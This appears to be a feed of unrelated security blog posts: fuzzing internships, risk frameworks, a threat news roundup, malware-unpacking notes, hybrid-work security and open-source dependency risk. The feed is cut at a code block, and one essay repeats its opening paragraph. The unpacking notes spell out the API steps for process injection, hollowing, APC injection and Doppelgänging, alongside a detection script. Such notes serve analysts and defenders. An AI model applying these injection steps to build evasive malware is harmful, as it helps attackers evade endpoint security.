The fuzzing interns worked towards integrating new projects and improving existing ones in OSS-Fuzz, our continuous fuzzing service for the open source community (which has 350+ projects, 22,700 bugs, 89% fixed). Several widely used open source libraries including but not limited to nginx, postgresql, usrsctp, and openexr, now have continuous fuzzing coverage as a result of these efforts.

Another group of interns focused on improving the security of the Linux kernel. syzkaller, a kernel fuzzing tool from Google, has been instrumental in finding kernel vulnerabilities in various operating systems. The interns were tasked with improving the fuzzing coverage by adding new descriptions to syzkaller (for example, ip tunnels, io_uring, and bpf_lsm), refining the interface description language, and advancing kernel fault injection capabilities.

Some interns chose to write fuzzers for Android and Chrome, which are open source projects that billions of internet users rely on. For Android, the interns contributed several new fuzzers for uncovered areas: network protocols such as pppd and dns, audio codecs like monoblend and g722, and the Android framework. On the Chrome side, interns improved existing blackbox fuzzers, particularly in the areas of DOM, IPC, media, and extensions, and added new libprotobuf-based fuzzers for Mojo.

Our last set of interns researched quite a few under-explored areas of fuzzing, including fuzzer benchmarking, ML-based fuzzing, differential fuzzing, and bazel rules for build simplification, and made useful contributions.

Over the course of the internship, our interns have reported over 150 security vulnerabilities and 750 functional bugs. Given the overall success of these efforts, we plan to continue hosting fuzzing internships every year to help secure the open source ecosystem and teach incoming open source contributors about the importance of fuzzing. For more information on the Google internship program and other student opportunities, check out careers.google.com/students. We encourage you to apply.

Cyber Security: Three Parts Art, One Part Science

understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”

There is quite a bit of subjectivity in the cyber security business. One auditor will look at evidence and agree you are in compliance; another will say you are not. If you are going to protect sensitive information, do you encrypt it, obfuscate it, or segment it off and place it behind very tight identification and access controls before allowing users to access the data? Yes. As we advise our client base, it is essential that we have all the context necessary to make good risk-based decisions and recommendations.

Let’s talk about Connection’s artistic methodology. We start with a canvas that addresses the core components of cyber security: protection, detection, and reaction. By addressing each of these three pillars in a comprehensive way, we ensure that the full conversation around how people, process, and technology all work together to provide a comprehensive risk strategy is achieved.

Related: Cyber Security is Everyone’s Business

Protection:

People
Users understand threat and risk and know what role they play in the protection strategy. For example, if you see something, say something. Don’t let someone surf in behind you through a badge check entry. And don’t think about trying to shut off your end-point anti-virus or firewall. In today’s remote workforce environment, good employee security awareness, especially related to phishing, is essential.

Process
Policies are established, documented, and socialized. For example, personal laptops should never be connected to the corporate network. Also, don’t send sensitive information to your personal email account so you can work from home.

Technology
Some examples of the barriers used to deter attackers and breaches are edge security with firewalls, intrusion detection and prevention, sandboxing, and advanced threat detection. Security leaders need to become students of threat, and deploy the correct technology to protect, detect, and react to threat.

Detection:

The average mean time to identify an active incident in a network is 197 days. The mean time to contain an incident is 69 days.

People
Incident response teams need to be identified and trained, and all employees need to be trained on the concept of “if you see something, say something.” Detection is a proactive process.

Process
What happens when an alert occurs? Who sees it? What is the documented process for taking action?

Technology
What is in place to ensure you are detecting malicious activity? Is it configured to ignore noise and only alert you of a real event? Will it help you bring that 197-day mean time to detection way down?

Reaction:

People
What happens when an event occurs? Who responds? How do you recover? Does everyone understand their role? Do you War Game to ensure you are prepared WHEN an incident occurs?

Process
What is the documented process to reduce the Kill Chain—the mean time to detect and contain—from 69 days to 69 minutes? Do you have a Business Continuity and Disaster Recovery Plan to ensure the ability to react to a natural disaster, a significant cyber breach such as ransomware, DDoS, or—dare I say it—a pandemic?

Technology
What cyber security consoles have been deployed that allow quick access to patch a system, change firewall rules, adjust ACLs or policy settings at an endpoint, or track a security incident through the triage process?

All of these things are important to create a comprehensive InfoSec Program. The science is the technology that will help you build a layered, in-depth defense approach. The art is how to assess the threat, define and document the risk, and create a strategy that allows you to manage your cyber risk as it applies to your environment, users, systems, applications, data, customers, supply chain, third party support partners, and business process.

More Art – Are You a Risk Avoider or Risk Transference Expert?

A better way to state that is, “Do you avoid all risk responsibility, or do you give your risk responsibility to someone else?” Hint: I don’t believe in risk avoidance or risk transference.

Yes, there is an art to risk management. There is also science if you use, for example, The Carnegie Mellon risk tools. But a good risk owner and manager documents risk, prioritizes it by risk criticality, turns it into a risk register or roadmap plan, remediates what is necessary, and accepts what is reasonable from a business and cyber security perspective. Oh, by the way, those same five cyber security professionals we talked about earlier have 17 definitions of risk.

As we wrap up this conversation, let’s talk about the importance of selecting a risk framework. It’s kind of like going to a baseball game and recognizing the program helps you know the players and the stats. What framework will you pick? Do you paint in watercolors or oils? Are you a National Institute of Standards (NIST) artist, an International Standards Organization artist, or have you developed your own framework like the Nardone puzzle chart? I developed this several years ago when I was the CTO/CSO of the Commonwealth of Massachusetts. It has been artistically enhanced over the years to incorporate more security components, but it is loosely based on the NIST 800-53 and ISO 27001 standards.

When it comes to selecting a security framework as a CISO, I lean towards the NIST Cyber Security Framework (CSF) pictured below. This framework is comprehensive and provides a scoring model that allows risk owners to measure and target what risk level they believe they need to achieve based on their business model, threat profile, and risk tolerance. It has five functional focus areas. The ISO 27001 framework is also a very solid and frequently used model. Both of these frameworks can result in a Certificate of Attestation demonstrating adherence to the standard. Many commercial corporations do an annual ISO 27001 assessment for that very reason. More and more are leaning towards the NIST CSF, especially commercial corporations doing work with the government. Keep in mind that frameworks mature, and compliance requirements change.  For example, if you are a commercial corporation doing business with the federal government, you will need to comply with the new Cyber Security Model Certification (CMMC) soon to continue doing business with the government.

As I reflect upon my 40 years as a cyber security professional, I think of the many instances where the basic tenets of cyber security—those we think have common understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”

The post Cyber Security: Three Parts Art, One Part Science appeared first on Connected.

This Week in Security News: A Look Inside the Bulletproof Hosting Business and Amazon Prime Day Spurs Spike in Phishing, Fraud Attacks


Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how cybercriminals secure their assets and survive in the business in a new Trend Micro report. Also, read about how cybercriminals are tapping into Amazon’s Prime Day with phishing and malicious websites that are fraudulently using the Amazon brand.

Read on:

French Companies Under Attack from Clever BEC Scam

Trend Micro researchers observed a new modus operandi involving a clever BEC campaign that uses social engineering to target French companies. Malicious actors impersonated a French company in the metal fabrication industry that provides services to several organizations. They then registered a domain very similar to the legitimate one used by the business and used it to send emails to their targets. 

Amazon Prime Day Spurs Spike in Phishing, Fraud Attacks

Cybercriminals are tapping into Amazon’s annual Prime Day with researchers warning of a recent spike in phishing and malicious websites that are fraudulently using the Amazon brand. There has been a spike in the number of new monthly phishing and fraudulent sites created using the Amazon brand since August, the most significant since the COVID-19 pandemic forced people indoors in March.

CSO Insights: DataBank’s Mark Houpt on Looking Beyond Securing Infrastructures in the New Normal

The big move to working remotely wasn’t completely difficult for Mark Houpt, CISO at DataBank. After all, he has been doing so since before COVID-19. However, when the pandemic hit, DataBank, like many other companies across the globe, had to help most of their employees transition securely and smoothly to virtual work. Read up on the several important security considerations this experience highlighted.

240+ Android Apps Caught Showing Out-of-Context Ads

This summer, Google removed more than 240 Android applications from the Play Store for showing out-of-context ads and breaking a newly introduced Google policy against this type of intrusive advertising. Out-of-context ads are mobile ads that are shown outside an app’s normal container and appear as pop-ups or as full-screen ads.

Safe and Smart Connections: Securing IoT Networks for Remote Setups

As a result of our work-from-home (WFH) arrangements, there is an increased demand on networks as remote operations have created greater dependence on the IoT. Subsequently, now is a good time to re-examine the security of your network. Rather than only focusing on securing individual devices that can compromise a network, users should also secure the network to minimize threats across several devices.

Inside the Bulletproof Hosting Business

The use of underground infrastructure is inherent to the modus operandi of a cybercriminal. In Trend Micro’s Underground Hosting series, it differentiates how cybercrime goods are sold in marketplaces and what kinds of services are offered. In this final part of the Underground Hosting report series, Trend Micro explores the methods criminals employ to secure their assets and survive in the business.

Comcast Voice Remote Control Could be Turned into Spying Tool

The Comcast XR11 voice remote controller was recently found to be vulnerable and could be turned into a spying tool that eavesdrops on users. Discovered by researchers at Guardicore, the attack has been named WarezTheRemote and is said to be a very serious threat, considering that the remote is used for over 18 million devices across the U.S.

Transforming IoT Monitoring Data into Threat Defense

In the first half of 2020, there was a 70% increase in inbound attacks on devices and routers compared to the second half of 2019, which included attacks on IoT systems. To protect customers effectively by continuously monitoring trends in IoT attacks, Trend Micro examined Mirai and Bashlite (aka Qbot), two notorious IoT botnet malware types, and shares the figures relating to these botnets’ command and control (C&C) servers, IP addresses, and C&C commands.

Russia’s Fancy Bear Hackers Likely Penetrated a Federal Agency

Last week the Cybersecurity and Infrastructure Security Agency published an advisory that hackers had penetrated a US federal agency. Now, clues uncovered by a researcher at cybersecurity firm Dragos and an FBI notification to hacking victims obtained by WIRED in July suggest that it was Fancy Bear, a team of hackers working for Russia’s GRU also known as APT28.

Threat Research & XDR Combine to Stop Cybercrime

Like legitimate businesses across the globe seeking to improve their information security and protect their network infrastructure, cybercriminal businesses take similar precautions. Trend Micro Research released the final report in a series focused on this part of cybercriminal business: Underground hosting providers. Based on the report, it’s clear that understanding both the criminal business and the attacks themselves better prepares defenders and investigators to identify and eliminate threats.

Researchers Find Vulnerabilities in Microsoft Azure Cloud Service

As businesses are increasingly migrating to the cloud, securing the infrastructure has never been more important. According to research by Paul Litvak of Intezer Labs, two security flaws in Microsoft’s Azure App Services could have enabled a bad actor to carry out server-side request forgery (SSRF) attacks or execute arbitrary code and take over the administration server.

Cyber Security Awareness: A Critical Checklist

October 2020 marks the 17th year of National Cybersecurity Awareness Month, where users and organizations are encouraged to increase awareness of cybersecurity issues. To help raise awareness, Trend Micro’s Consumer Division breaks down the security issues you should be aware of and shares tips about how you can protect yourself and your family while working, learning, or gaming at home.

The Basics of Keeping Kubernetes Cluster Secure: Worker Nodes and Related Components

In part one of this blog series, Trend Micro talked about the different ways developers can protect control plane components, including Kube API server configurations, RBAC authorization, and limitations in the communication between pods through network policies. In this second part, Trend Micro focuses on best practices that developers can implement to protect worker nodes and their components.

Are you surprised that Comcast voice activated remote controllers could be turned into a spying tool?  Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


How To Unpack Malware: Personal Notes

Nowadays malware authors use many techniques to hide malicious payloads in order to bypass security products and to make the malware analyst’s life harder (and more fun). There are many tools you can use to extract content from malware and there is no standard process: you can use different tools, techniques and approaches to solve the same problem.

In this post I am going to quickly describe three (well, actually kind of four) of the main flows that let me succeed in unpacking malware. Let me repeat that there are many ways to approach this topic; I simply want to share some personal notes on my favorite flows, without pretending to write full course material on how to unpack malware, which would be worth a full university class.

NB: there is a lot to say about packers, what they are and how they behave, and even about how many packer families are known, but this is not the place for that. Here I am mostly focusing on quick shortcuts that are useful when you are in a rush, but that are not as powerful as debugging the entire process.

Method 0: Just Unpack It, I don’t care more

If you are in a rush and just need to unpack a sample as quickly as possible, and you don’t care about what is going on underneath, Sergei Frankoff (@herrcore) and Sean Wilson (@seanmw) did a great job in releasing Unpac.ME, a web application that tries to unpack your sample. There is a limited free plan for using it, and it works most of the time, especially with known malware families.

Method 1: The quick way

One of the quickest ways to unpack malware is to figure out which packer was used to pack your sample. Once you know the packer, you just need to run the corresponding unpacker and you are done. Detect It Easy, better known as DiE, helps with this research. It has a wide signature database tracking hundreds of different packers. The following image shows DiE spotting a simple (and very didactic, not really real-world) UPX packer.

Once you know the sample has been packed with UPX 3.91, grab the packer that was used (in this case from https://upx.github.io/), take the corresponding unpacker and run it against your original sample; you will get a new PE file.

Method 2: The slow but fun way

This is my favorite method, since it is definitely faster than using a debugger and performing every step by yourself, yet still quite powerful, giving you control over many actions happening in memory. Before going into this method you need to know the following main assumptions.

  1. The packer performs some operations on bytes (read from an external file, from the same file, or taken from the network), then it aggregates those bytes and later passes the execution flow (EIP) to them. We call those bytes the “payload”.
  2. Injecting control flows is the main strategy used by packers.
  3. Intercepting the injection flow abstracts us from the packer that was used.

It is now interesting to understand how injection happens on a Windows machine. Once we have nailed that, we can agree that a quick way to unpack malware is simply to grab the content of the allocated and injected memory before the main sample (or stub) transfers control by passing EIP and the stack to the new code.

Main Injection techniques to look for

Fortunately there are not thousands of different ways to inject shellcode into memory, so let’s take a closer look at the main ones. The most used is named process injection.

The process injection schema follows these main steps:

  • OpenProcess – The OpenProcess function returns a handle of an existing process object.
  • VirtualAllocEx – The VirtualAllocEx function is used to allocate the memory and grant the access permissions to the memory address.
  • WriteProcessMemory – The WriteProcessMemory function writes data to an area of memory in a specified process.
  • CreateRemoteThread – The CreateRemoteThread function creates a thread that runs in the virtual address space of another process.

Another widely used technique is DLL injection, which follows these steps:

  • OpenProcess to obtain the handle of the target process in which we intend to inject our DLL.
  • Find the address of the LoadLibraryA function using the GetProcAddress and GetModuleHandleA functions. The LoadLibraryA function is used for loading the DLL into the calling process.
  • VirtualAllocEx to allocate the memory space for the DLL path from where we will be loading the DLL.
  • WriteProcessMemory for writing the DLL path into the allocated memory space.
  • CreateRemoteThread for creating a new thread, passing the address of LoadLibraryA as the start address and the address of the DLL path as the parameter for the LoadLibraryA function.

Process Hollowing is a nice and widely used trick to evade endpoint security and to inject control flows. The main idea is to build a suspended process within un-mapped memory, then replace the un-mapped memory section with the shellcode, and later on map it and start the process. The steps follow:

  • Create a new target process in suspended state. This can be achieved by passing the CREATE_SUSPENDED value in the dwCreationFlags parameter of the CreateProcess Windows API.
  • Once the process is created in suspended state we will create a new executable section. It won’t be bound to any process. This can be done by using the ZwCreateSection function.
  • We need to locate the base address of the target process. This can be done by querying the target process using the ZwQueryInformationProcess function. We can find the address of the process environment block (PEB) and then use the ReadProcessMemory function to read the PEB. Once the PEB is read, the ReadProcessMemory function is used once again to locate the entry point from the buffer.
  • We need to bind the section to the target process in order to copy the shellcode into it. To achieve this we need to map the section into the current process. This can be done by using the ZwMapViewOfSection function and passing the handle of the current process obtained with the GetCurrentProcess function.
  • Now we will copy each byte of the shellcode into the mapped section which was created in Step 2.
  • Once the shellcode is copied we can proceed to map the section into the target process. This can be done by using the ZwMapViewOfSection function and passing the handle of the target process.
  • Once the section is mapped we will locate and construct the patch for the target process so that it can execute our malicious shellcode instead of the original application code.
  • Once the patch is constructed we will use WriteProcessMemory to write the constructed patch into the target process entry point.
  • After writing the constructed patch to the target process entry point we need to resume the thread. This can be achieved by using the ResumeThread function.

Abusing the Asynchronous Procedure Call (APC) is another way to inject shellcode into processes. The way to exploit this Microsoft functionality follows these steps:

  • Create a new target process in suspended state. This can be achieved by passing the CREATE_SUSPENDED value in the dwCreationFlags parameter of the CreateProcess Windows API.
  • Once the process is created, obtain the handle of the target process using the OpenProcess Windows API.
  • Allocate the memory space for our shellcode in the target process using the VirtualAllocEx Windows API.
  • Write the shellcode in the allocated memory space using the WriteProcessMemory Windows API.
  • Obtain the handle of the primary thread from the target process using the OpenThread Windows API.
  • After obtaining the handle of the thread from the target process we will add a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread using the QueueUserAPC Windows API, which will point to the memory address of our shellcode.
  • To trigger our shellcode we will resume the suspended thread using the ResumeThread Windows API.

The last method that I am going to describe in my personal notes (but there are many more out there) is called Process Doppelgänging. Quite a recent technique, it uses a little-known API for NTFS transactions.

Briefly speaking, we can create a file inside a transaction, and for no other process this file is visible, as long as our transaction is not committed. It can be used to drop and run malicious payloads in an unnoticed way. If we roll back the transaction in an appropriate moment, the operating system behaves like our file was never created.

hasherezade

Process Doppelgänging is a similar technique used to inject control flow and to evade common AV. It follows these steps:

  • Create a new transaction, using the API CreateTransaction.
  • Create a dummy file to store our payload (CreateFileTransacted).
  • The file is used to create a section (a buffer in a special format), which forms the base for our new process.
  • Now it’s time to close the file and roll back the transaction (RollbackTransaction).

All these methods are used to inject payloads into memory and to run them while keeping a very low detection rate. Our goal is to intercept those techniques and to dump the just-injected payload.
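One way to turn the step lists above into a triage check, as an added example that is not part of the original post: it matches each technique's API calls, in the order listed above, against an API-monitor trace and reports the final call of the sequence, before which the injected memory should be dumped. The trace format, PIDs, handles and addresses are constructed for illustration and do not come from any real tool.

```python
import re
from collections import defaultdict, namedtuple

Event = namedtuple("Event", "line pid api args")
Finding = namedtuple("Finding", "pid technique last_api line")

# Ordered API steps per technique, as listed in the post.
# Each step is (api, substring that must appear in the arguments, or None).
SIGNATURES = {
    "process injection": [
        ("OpenProcess", None), ("VirtualAllocEx", None),
        ("WriteProcessMemory", None), ("CreateRemoteThread", None)],
    "DLL injection": [
        ("OpenProcess", None), ("GetProcAddress", "LoadLibrary"),
        ("VirtualAllocEx", None), ("WriteProcessMemory", None),
        ("CreateRemoteThread", None)],
    "process hollowing": [
        ("CreateProcess", "CREATE_SUSPENDED"), ("ZwCreateSection", None),
        ("ZwQueryInformationProcess", None), ("ReadProcessMemory", None),
        ("ZwMapViewOfSection", None), ("WriteProcessMemory", None),
        ("ResumeThread", None)],
    "APC injection": [
        ("CreateProcess", "CREATE_SUSPENDED"), ("OpenProcess", None),
        ("VirtualAllocEx", None), ("WriteProcessMemory", None),
        ("OpenThread", None), ("QueueUserAPC", None), ("ResumeThread", None)],
    "process doppelganging": [
        ("CreateTransaction", None), ("CreateFileTransacted", None),
        ("RollbackTransaction", None)],
}
KNOWN = {api for steps in SIGNATURES.values() for api, _ in steps}
# Hypothetical trace line format: "<pid> <ApiName>(<arguments>)"
LINE_RE = re.compile(r"^(\d+)\s+(\w+)\((.*)\)\s*$")


def normalize(name):
    """Fold Nt*/Zw* and ANSI/Unicode (A/W) variants onto the signature names."""
    if name.startswith("Nt") and "Zw" + name[2:] in KNOWN:
        name = "Zw" + name[2:]
    if name[-1] in "AW" and name[:-1] in KNOWN:
        name = name[:-1]
    return name


def parse(trace):
    """Group well-formed trace lines by PID; malformed lines are skipped."""
    by_pid = defaultdict(list)
    for lineno, raw in enumerate(trace.splitlines(), start=1):
        m = LINE_RE.match(raw.strip())
        if m:
            pid = int(m.group(1))
            by_pid[pid].append(Event(lineno, pid, normalize(m.group(2)), m.group(3)))
    return by_pid


def match(events, steps):
    """Return the events matching `steps` as an ordered subsequence, or None."""
    matched, pos = [], 0
    for api, needle in steps:
        while pos < len(events):
            ev = events[pos]
            pos += 1
            if ev.api == api and (needle is None or needle in ev.args):
                matched.append(ev)
                break
        else:
            return None  # ran out of events before this step was seen
    return matched


def classify(trace):
    """Map each PID to its findings, most specific (longest) signature first."""
    findings = {}
    for pid, events in parse(trace).items():
        hits = []
        for technique, steps in SIGNATURES.items():
            matched = match(events, steps)
            if matched:
                last = matched[-1]
                hits.append((len(steps), Finding(pid, technique, last.api, last.line)))
        if hits:
            hits.sort(key=lambda h: -h[0])
            findings[pid] = [f for _, f in hits]
    return findings


# Constructed sample trace: three interleaved processes and one damaged line.
TRACE = """\
1312 OpenProcess(PROCESS_ALL_ACCESS, 0, 4020)
2044 CreateProcessW("svchost.exe", CREATE_SUSPENDED)
1312 GetModuleHandleA("kernel32.dll")
1312 GetProcAddress(0x76a40000, "LoadLibraryA")
2044 NtCreateSection(SECTION_ALL_ACCESS, SEC_COMMIT)
3000 OpenProcess(PROCESS_QUERY_INFORMATION, 0, 4020)
1312 VirtualAllocEx(0x1f4, 0, 0x104, MEM_COMMIT, PAGE_READWRITE)
2044 NtQueryInformationProcess(0x2a8, ProcessBasicInformation)
2044 ReadProcessMemory(0x2a8, 0x7ffd3000, 0x1000)
-- truncated line from the monitor --
1312 WriteProcessMemory(0x1f4, 0x00a10000, "sample.dll")
3000 ReadProcessMemory(0x3c0, 0x00400000, 0x200)
2044 NtMapViewOfSection(0x2b0, CURRENT_PROCESS)
2044 NtMapViewOfSection(0x2b0, 0x2a8)
1312 CreateRemoteThread(0x1f4, 0x76a5d7a0, 0x00a10000)
2044 WriteProcessMemory(0x2a8, 0x01001a30, 0x10)
2044 ResumeThread(0x2ac)
"""

if __name__ == "__main__":
    for pid, found in classify(TRACE).items():
        best = found[0]
        print(f"pid {pid}: {best.technique}; dump before line {best.line} ({best.last_api})")
```

A DLL injection trace also satisfies the shorter process injection signature, which is why findings are ordered by signature length and the first entry is taken as the best label.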

Intercept these techniques and drop the payload

Now that we know the main techniques malware uses to unpack itself into memory, we are ready to understand how to hook such functions in order to grab the payload (which holds the real behavior). Again, there are many techniques to perform this memory extraction, and I have changed at least 4 workflows so far, but the one I prefer at the moment is using PE-sieve to extract injected objects. PE-sieve is not able to judge the dropped files (are they malicious or not?), so you cannot consider every extracted artifact malicious; you need to analyze them manually and draw your own conclusions.

But let’s start with a practical example. The following image represents a PE file pretending to be a PNG image.

A PE sample pretending to be a .PNG

Looking at the sections and the import table (IAT), we can observe that the sample imports only some of the well-known functions we have just seen in the previous section (VirtualProtect, GetProcAddress, MoveMemory, etc.), which are very often used to unpack malware in memory without touching the hard drive.

Import Table

Even the embedded resources are quite “heavy”, which probably hides some piece of code (??). So… we have a PE file that pretends to be an image, imports only suspicious functions and has quite a heavy resource. Could it be malware?

Looking at resources

Well, we have ideas and suspicions, but let’s see whether it injects pieces of code into memory and what they do. Here PE-sieve comes to help us. First of all you need to sacrifice a system :D. Yep, really… you need to run the sample on your target and, alongside it, run PE-sieve, giving it the PID of the suspicious sample. PE-sieve will hook and monitor the previous injection patterns, and as soon as it finds the right pattern it will drop whatever the sample injects (good files, malicious implants, etc.). The following image shows the implants found while running that sample.

2 Implanted Objects

The dropped files are placed into a directory named with the monitored PID.

Dropped Files

We get some files in that directory. There is a .json report, useful to automate results and wrap them into external projects without using the provided PE-sieve.dll, plus a couple of shellcode files (.shc) and three PE files. The interesting one is 400000.cursor.exe, since it has 600KB of code, it is executable, and it has a new ICO different from the original one. Let’s check its properties (following image).

Unpacked Property

Now, let’s roll back our sacrificed VM and run this new file on it. Then let’s check its memory to see if something more is happening there.

Memory from Unpacked one

It looks like we have clear text, with no additional encryption/packing stage, as shown in memory. We can now continue with classic malware analysis techniques, performing static and dynamic analysis. And, yes, since you are re-sacrificing your virtual machine, maximize your effort by also grabbing the network traffic to see where the sample tries to communicate.

Traffic Analysis

We are facing a nice example of TrickBot version: 1000512 tag: tot793. The following image shows the same information, but coming from the internal system calls rather than from network traces.

Internal Traces

So we nailed it. We’ve just extracted the real payload and later on we figured out it was a TrickBot.

Method 3: The old-fashioned way (debugger)

Everything can be done from the debugger. You can find the above API patterns by yourself, then follow the system calls and stop and copy whenever you want. You can extract or modify the sample’s behavior on the fly and re-run it as many times as you need. Yes, you can, but this takes a lot of time. Time runs against the economy: the more time you need to perform your analysis, the more expensive you are, and the more expensive you are, the fewer customers you can have, both money-wise (expensive = for few ~ cheap = for many) and time-wise (since you have 24h a day, after those hours you cannot accept more customers). So you need to mediate between quality/fun and time.

If you have been following me for some time, you probably remember that I used this method years ago, before such great tools were released (just a few examples: IDA Pro Universal Unpacker or All In Memory CryptoWorm or New way to detect Packers etc.), but today I would not suggest this method unless you are a student or not a professional malware analyst.

Securing an Agile and Hybrid Workforce

Guest article by Andrea Babbs, UK General Manager, VIPRE

2020 has forced businesses to revise many of their operations. One significant transition is the shift to a remote working model, for which many were unprepared in terms of equipment, infrastructure and security. As the government now urges people to return to work, we’re already seeing a shift towards a hybrid workforce, with many employees splitting their time between the office and working from home.

As organisations are now reassessing their long-term office strategies, front and centre to that shift needs to be their IT security underpinned by a dependable and flexible cloud infrastructure. Andrea Babbs, UK General Manager, VIPRE, discusses what this new way of working means long-term for an organisation’s IT security infrastructure and how businesses can successfully move from remote working to a secure and agile workforce.

Power of the Cloud
In light of the uncertainty that has plagued most organisations, many are looking to options that can future-proof their business and enable as much continuity as possible in the event of another unforeseen event. The migration of physical servers to the Cloud is therefore a priority, not only to facilitate agile working, but to provide businesses with greater flexibility, scalability and more efficient resources. 

COVID-19 accelerated the shift towards Cloud-based services, with more data than ever before now being stored in the Cloud. For those organisations working on Cloud-based applications and drives, the challenges of the daily commute, relocations for jobs and not being able to ‘access the drive’ are in the past for many. Cloud services are moving with the user – every employee can benefit from the same level of security no matter where they are working or which device they are using. However, it’s important to ensure businesses are taking advantage of all the features included in their Cloud subscriptions, and that they’re configured securely for hybrid working. 

Layered Security Defence
Cloud-powered email, web and network security will always underline IT security defences, but these are only the first line of defence. Additional layers of security are also required to help the user understand the threat landscape, both external and internal. Particularly when working remotely with limited access to IT support teams, employees must be ready to question, verify the authenticity and interrogate the risk level of potential phishing emails or malicious links. 

With increased pressure placed on users to perform their roles faster and achieve greater results than ever before, employees will do what it takes to power through and access the information they need in the easiest and quickest way possible. This is where the cloud has an essential role to play in making this happen, not just for convenience and agility but also to allow users to stay secure – enabling secure access to applications for all devices from any location and the detection and deletion of viruses – before they reach the network. 

Email remains the most-used communication tool, even more so when remote working, but it also remains the weakest link in IT security, with 91% of cybercrimes beginning with an email. Implementing innovative tools that prompt employees to double-check emails before they send them can help reduce the risk of sharing the wrong information with the wrong individual.

Additional layers of defence, such as email checking tools, are removing the barriers which slow the transition to agile working and are helping to secure our new hybrid workforce, regardless of the location they’re working in, or what their job entails.

Educating the User
The risk an individual poses to an organisation can often be the main source of vulnerability in a company’s IT infrastructure. When remote working became essential overnight, businesses faced the challenges of malware spreading from personal devices, employees being distracted and exposing incorrect information and an increase in COVID-related cyber-attacks. 

For organisations wanting to evolve into a hybrid work environment, their IT security policies need to reflect the new reality. By re-educating employees about existing products and how to leverage any additional functionality to support their decision making, users can be updated on these cyber risks and understand their responsibilities.

Security awareness training programmes teach users to be alert and more security conscious as part of the overall IT security strategy. In order to fully mitigate IT security risks and for the business to benefit from an educated workforce, both in the short and long term, employees need to change their outdated mindset. 

Changing the Approach
The evolution of IT and security over the past 20 years means that working from home is now easily achievable with cloud-based setups, whereas in the not too distant past, it would have been impossible. But the key to a successful and safe agile workforce is to shift the approach of full reliance on IT, to a mindset where everyone is alert, responsible, empowered and educated with regular training, backed up by tools that reinforce a ‘security first’ approach. 

IT departments cannot be expected to stay one step ahead of cybercriminals and adapt to new threats on their own. They need their colleagues to work mindfully and responsibly on the front lines of cyber defence, comfortable in the knowledge that everything they do is underpinned by a robust and secure IT security infrastructure, but that the final decision to click the link, send the sensitive information or download the file, lies with them. 

Conclusion
As employees prove they can work from home productively, the role of the physical office is no longer necessary. For many companies, it is a sink or swim approach when implementing a hybrid and agile workforce. Introducing and retaining flexibility in operations now will help organisations cope better with any future unprecedented events or crises.

By focusing on getting the basics right and powered by the capabilities of the Cloud, highlighting the importance of layered security and challenging existing mindsets, businesses will be able to shift away from remote workers being the ‘exception,’ to a secure and agile workforce as a whole.

5 Lessons About Software Security for Cybersecurity Awareness Month

October is cybersecurity awareness month, and this year, the overarching theme is “Do Your Part. #BeCyberSmart.” When considering what “cybersmart” means in application security, we realized we unearthed some data this year that made us a little cybersmarter and could help other security professionals and developers increase their AppSec smarts as well. We’re sharing those data gems below.

1. Lack of developer participation in and engagement with security training is a problem.

A recent research report, sponsored by Veracode and conducted by Enterprise Strategy Group (ESG), found that most organizations require their developers to consume AppSec training, but 35 percent said less than half of development teams are participating in formal training. In addition, most respondents reported that they lack programs to measure the effectiveness of developer security training. What’s the lesson here? Given that developers have been increasingly tasked with implementing security measures, including writing secure code and remediating vulnerabilities, it’s vital that they are trained to do so. But it has to be relevant, engaging training that will encourage participation.

2. It’s nearly impossible to have effective AppSec without integrating into developer workflows.

In the ESG survey, 43 percent of organizations agreed that DevOps integration is critical to improving application security (AppSec) programs. With the speed of development today, security tests that slow or block developers are simply not feasible. Lesson No. 2: AppSec should be integrated and automated. Integrating security measures into the CI/CD toolchain not only makes it easier for developers to run AppSec tests, but it also helps organizations discover security issues sooner, which speeds up time to deployment.

3. Open source code is pervasive, vulnerable, and typically not checked for security.

Our most recent State of Software Security (SOSS) report found that a typical Java application is made up of 97 percent open source and third-party libraries. In addition, our State of Software Security: Open Source Edition report published this year found that 70.5 percent of applications have a security flaw in an open source library. But, shockingly, the ESG report referenced above found that less than 50 percent of organizations scan their open source libraries for security. Why? It’s not uncommon for application developers to assume that third-party libraries were already scanned for vulnerabilities by library developers. Unfortunately, you can’t rely on library developers to keep your applications safe. The cybersmart practice is to scan third-party libraries on a regular basis.

4. You could be pulling in more open source code than you think.

Developers pull in one open source library, but that library is dependent on another library, which is dependent on another library, and so on. In fact, research for our State of Software Security: Open Source Edition report found that most applications have a large percentage of secondary (and tertiary, and more) dependencies.

Take a look at the image below taken from our Software Composition Analysis solution. The empty circle in the middle is your application, and all of the sections around it are different direct and indirect libraries. In this specific example, all of the colored sections are libraries containing vulnerabilities that affect the application either directly or indirectly. Bottom line: Get a handle on all the code that makes up your applications, even the open source code reaching your app indirectly.

[Figure: software composition analysis]

5. The majority of open source flaws are pulled into the code indirectly.

As mentioned above, flaws can be introduced into code directly by the application developer or indirectly by another library in use. And flaws introduced indirectly, known as transitive dependencies, make up the majority of open source flaws. In fact, in our recent report, State of Software Security: Open Source Edition, we found that 70.5 percent of the applications had an open source flaw, and of those applications, 46.6 percent of the flaws were transitive, and 41.9 percent were direct (11.5 percent were both).

[Figure: direct and transitive dependencies]

Takeaway: You can have vulnerabilities lurking several layers deep; don’t be complacent if you’re just assessing the security of your direct dependencies.
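The direct/transitive/both split described in lessons 4 and 5 can be reproduced on any dependency graph. The following is an added example, not code from the report or from any scanning product; the graph, the library names and the list of flawed libraries are all constructed for illustration.

```python
from collections import deque

# Constructed dependency graph: each key depends on the libraries in its list.
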